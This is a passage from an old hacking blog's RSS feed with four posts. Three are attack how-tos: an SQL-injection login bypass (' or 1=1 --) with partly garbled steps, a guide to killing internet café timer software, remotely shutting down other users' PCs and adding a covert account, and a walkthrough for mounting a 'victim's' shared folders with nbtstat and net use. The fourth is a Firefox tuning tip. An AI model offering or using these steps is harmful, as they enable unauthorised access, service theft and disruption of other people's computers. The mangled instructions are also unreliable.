		<description><![CDATA[Hacking Websites If you posses the HTML &#38; JAVA knowledge then u can even access password protected websites. To hack a Password Protected Websites just follow these steps: - * Open the website u want to hack. Provide wrong username-password. (e.g : Username &#8211; me and Password &#8211; &#8216; or 1=1 &#8211;) An error occured [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=15&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hacking Websites</p>
<p>If you posses the HTML &amp; JAVA knowledge then u can even access password protected websites.</p>
<p>To hack a Password Protected Websites just follow these steps: -</p>
<p>* Open the website u want to hack. Provide wrong username-password.<br />
(e.g : Username &#8211; me and Password &#8211; &#8216; or 1=1 &#8211;)<br />
An error occured saying wrong username-password. Now be prepared<br />
your work starts from here&#8230;</p>
<p>* Right click anywhere on that page =&gt;&gt; go to view source.</p>
<p>* There u can see the html coding with java scripts.</p>
<p>* Before this login information copy the url<br />
of the site in which you are.<br />
* Then delete the java script from the above that validates your<br />
information in the server.(Do this very carefully, your success to<br />
hack the site depends upon this i.e. how efficiently u delete the<br />
JavaScript’s that validate your account information)</p>
<p> </p>
<p>then look for&#8230;code ..: input name=&#8221;password&#8221; type=&#8221;password&#8221;<br />
=&gt; replace<br />
there instead of . See there if<br />
max length of password is less than 11 then increase it to 11<br />
(e.g. : if then write</p>
<p>* Just go to file =&gt; save as and save it any where within<br />
the hard disk with ext.html(e.g. :c:hack.htm)</p>
<p>* Close your webpage and go to the webpage u save in your<br />
hard disk(e.g : c:hack.htm) Open it.</p>
<p>* U see that some changes in current page as compared to original<br />
One. Don&#8217;t worry.</p>
<p>* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]</p>
<p>Congrats! Your have cracked the above website and entered into the<br />
account of Ist user saved in the server&#8217;s database.</p>
<p>The above trick doesn&#8217;t work on the websites using latest<br />
technique to protect there servers.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=15&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-websites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Speed up Mozilla Firefox about 3-30x Faster</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/speed-up-mozilla-firefox-about-3-30x-faster/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/speed-up-mozilla-firefox-about-3-30x-faster/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 17:35:13 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Windows Tips Cllection]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=14</guid>
		<description><![CDATA[Speed up Mozilla Firefox about 3-30x Faster If your a firefox lover like me then you should try this. 1. Type &#8220;about:config&#8221; into the address bar and hit return. Scroll down and look for the following entries: network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests Normally the browser will make one request to a web page at a time. When [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=14&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Speed up Mozilla Firefox about 3-30x Faster</p>
<p>If your a firefox lover like me then you should try this.</p>
<p>1. Type &#8220;about:config&#8221; into the address bar and hit return. Scroll<br />
down and look for the following entries:</p>
<p>network.http.pipelining<br />
network.http.proxy.pipelining<br />
network.http.pipelining.maxrequests</p>
<p>Normally the browser will make one request to a web page at a time.<br />
When you enable pipelining it will make several at once, which really<br />
speeds up page loading.</p>
<p>2. Alter the entries as follows:</p>
<p>Set &#8220;network.http.pipelining&#8221; to &#8220;true&#8221;</p>
<p>Set &#8220;network.http.proxy.pipelining&#8221; to &#8220;true&#8221;</p>
<p>Set &#8220;network.http.pipelining.maxrequests&#8221; to some number like 30. This<br />
means it will make 30 requests at once.</p>
<p>3. Lastly right-click anywhere and select New-&gt; Integer.<br />
Name it &#8220;nglayout.initialpaint.delay&#8221; and set its value to &#8220;0&#8243;.<br />
This value is the amount of time the browser waits before it acts on information it recieves.</p>
<p>If you&#8217;re using a broadband connection you&#8217;ll load pages 2-30 times faster now.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=14&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/speed-up-mozilla-firefox-about-3-30x-faster/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking internet Cafe</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-internet-cafe/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-internet-cafe/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 17:32:18 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=13</guid>
		<description><![CDATA[Hacking internet Cafe Basic overview of this tutorial is if there&#8217;s some kind of timer or client software on the computer you&#8217;re using at the Net Cafe you can hopefully disable it. Firstly we need to gain access to command prompt (cmd.exe) to do this there&#8217;s a few ways. 1) The most basic is to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=13&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hacking internet Cafe<br />
Basic overview of this tutorial is if there&#8217;s some kind of timer or client<br />
software on the computer you&#8217;re using at the Net Cafe you can hopefully disable it.</p>
<p>Firstly we need to gain access to command prompt (cmd.exe) to do this there&#8217;s a few<br />
ways.</p>
<p>1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.<br />
Say that&#8217;s disabled then we can try some other methods.</p>
<p>2) Press the Windows Logo + R and it will start run up. (hopefully)</p>
<p>3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.</p>
<p>4) Open notepad type &#8220;cmd.exe&#8221; without the quotation marks (&#8220;&#8221;) and then<br />
go to File/Save As.. and type the name for the file and have it end with<br />
.bat for example &#8220;MyNewFile.bat&#8221; and select Save as type and select All Files.</p>
<p>Make sure to save it somewhere you can access it, Like the desktop.</p>
<p>If they have deleted Notepad then go in to Internet Explorer and right click<br />
and select View Source or on the menu bar click View then source and perform the<br />
same process as above.</p>
<p>Once you have done this you can run the file. If you can&#8217;t open files from the desktop<br />
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to<br />
the Desktop and it will show the saves files on the desktop in a folder type window.<br />
Once you have access to command prompt you can perform some usefull actions e.g shutdown<br />
programs, shutdown other peoples computers, add new accounts.</p>
<p>Ok, well most Net cafes have software running that boots you off of the machine after a certain<br />
ammount of time unless you pay for more time. Well, we don&#8217;t want that to happen now do we?</p>
<p>Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.</p>
<p> </p>
<p>For more info on the software running we can use the command &#8220;tasklist&#8221; inside of command prompt.</p>
<p>example: &#8220;tasklist&#8221; (without quotation marks)</p>
<p>Basicly it brings up all the processes running.<br />
Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?<br />
we use &#8220;taskkill&#8221; &gt;:]</p>
<p>Basicly kills the process we specifcy. Say the Net Cafes software is &#8220;Timer.exe&#8221; for example and it&#8217;s shown in<br />
the task list like that we would do this.</p>
<p>example: &#8220;taskkill /im Timer.exe /f&#8221;</p>
<p>/im : is for image name. Not quite sure what it means, but we need it.</p>
<p>Timer.exe : that&#8217;s the Net cafes software/process name (example)</p>
<p>/f : Forcefully shuts the program.<br />
Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.</p>
<p>If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn&#8217;t rely on.</p>
<p> </p>
<p>Perhaps you want to have a little fun with people on the network at the Net cafe? well here&#8217;s a few things for you<br />
to do with command prompt.</p>
<p>Find the people on the network with &#8220;net view&#8221; and it will list the other computers names on the network.</p>
<p>The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in<br />
handy)</p>
<p>example: &#8220;shutdown -s -m HJCPwnts -t 20 -c You&#8217;re being shutdown&#8221;</p>
<p>use &#8220;shutdown -a&#8221; to cancel this action so you don&#8217;t shut your own computer down.</p>
<p>-s : sets the shutdown action.</p>
<p>-m : specify the computer name (HJCPwts) that&#8217;s what my computer name would be on the network. (to find out<br />
how to find computer names use net view. It will list the other computer names.)</p>
<p>-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.</p>
<p>-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)</p>
<p>-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing<br />
it to someone else.</p>
<p>Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.</p>
<p>In command prompt type &#8220;net user CoolGuy /add&#8221; this basically adds a new user by the name of CoolGuy. Simple ehh?<br />
well we have struck a problemo. How the hell do we login to that account? EASY!</p>
<p>In fact we have already covered most of it. We will be using the shutdown command again.</p>
<p>&#8220;shutdown -l&#8221; : basicly this logs us out and we can log back in with the CoolGuy account.</p>
<p>-l : sets the logout action.</p>
<p>Ok, so you have had your fun with the new account now and you want to get rid of it in case<br />
of the Net Cafe staff finding it. Well that&#8217;s simple aswell, all we do is..</p>
<p>&#8220;net user CoolGuy /delete&#8221; and it will delete that user. Make sure to check it has been<br />
deleted by using &#8220;net user&#8221; and it will show the accounts.</p>
<p>PS This wasn&#8217;t written by me. I&#8217;m just sharing it. All due credit goes to the original poster.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=13&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-internet-cafe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking In 15 Seconds !!!</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-in-15-seconds/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-in-15-seconds/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 17:30:31 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking Websites]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=12</guid>
		<description><![CDATA[Hacking In 15 Seconds! If your victim possess certain security flaws then her system can be broken into in less that 15 seconds. This is how : - Click &#8220;Start -&#62; Run -&#62; cmd&#8221; Type the following at the Dos Prompt Code:   Nbtstat -A &#60;IP address&#62;   [e.g: nbtstat -A 207.175.1.1]   This will [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=12&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hacking In 15 Seconds!</p>
<p>If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.</p>
<p>This is how : -</p>
<p>Click &#8220;Start -&gt; Run -&gt; cmd&#8221;</p>
<p>Type the following at the Dos Prompt<br />
Code:</p>
<p> </p>
<p>Nbtstat -A &lt;IP address&gt;</p>
<p> <br />
[e.g: nbtstat -A 207.175.1.1]</p>
<p> </p>
<p>This will give you a read out that looks like this<br />
Code:</p>
<p>NetBIOS Remote Machine Name Table<br />
____________________________________<br />
Name Type Status<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
abhi &lt;00&gt; UNIQUE Registered<br />
WORK &lt;00&gt; GROUP Registered<br />
abhi &lt;03&gt; UNIQUE Registered<br />
abhi &lt;20&gt; UNIQUE Registered<br />
WORK &lt;1E&gt; GROUP Registered<br />
WORK &lt;1D&gt; UNIQUE Registered<br />
__MSBROWSE__.&lt;01&gt;GROUP Registered<br />
____________________________________<br />
The numbers in the &lt;&gt; are hex code values. What we are</p>
<p>interested in is the Ã¢â‚¬Å“Hex Code-Â number of &lt;20&gt;.</p>
<p>A hex code of &lt;20&gt; means you have file and printer sharing turned on.</p>
<p>Next step is to find out what is being shared. This is how : -<br />
Code:</p>
<p>Net view <a href="//\\&lt;insert">\\&lt;insert</a> ip_address here&gt;<br />
[e.g : net view <a href="//\\207.175.1.1">\\207.175.1.1</a>]</p>
<p> <br />
You will then get a response that looks something like this.</p>
<p>Code:</p>
<p>Shared resources at <a href="//\\ip_address">\\ip_address</a><br />
Sharename Type Comment<br />
______________________<br />
MY DOCUMENTS Disk<br />
TEMP Disk<br />
______________________</p>
<p>(The command was completed successfully.)</p>
<p> <br />
Code:</p>
<p>Net use x: <a href="//\\&lt;insert">\\&lt;insert</a> IP address here&gt;\temp<br />
[e.g : net use x: <a href="//\\207.175.1.1\temp">\\207.175.1.1\temp</a>]</p>
<p> <br />
If all goes well for you, you will then get a response of<br />
Code:<br />
(The command was completed successfully.)<br />
Open my computer you will see your victim&#8217;s temp folder there</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/12/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/12/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/12/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=12&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-in-15-seconds/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
	</channel>
</rss>
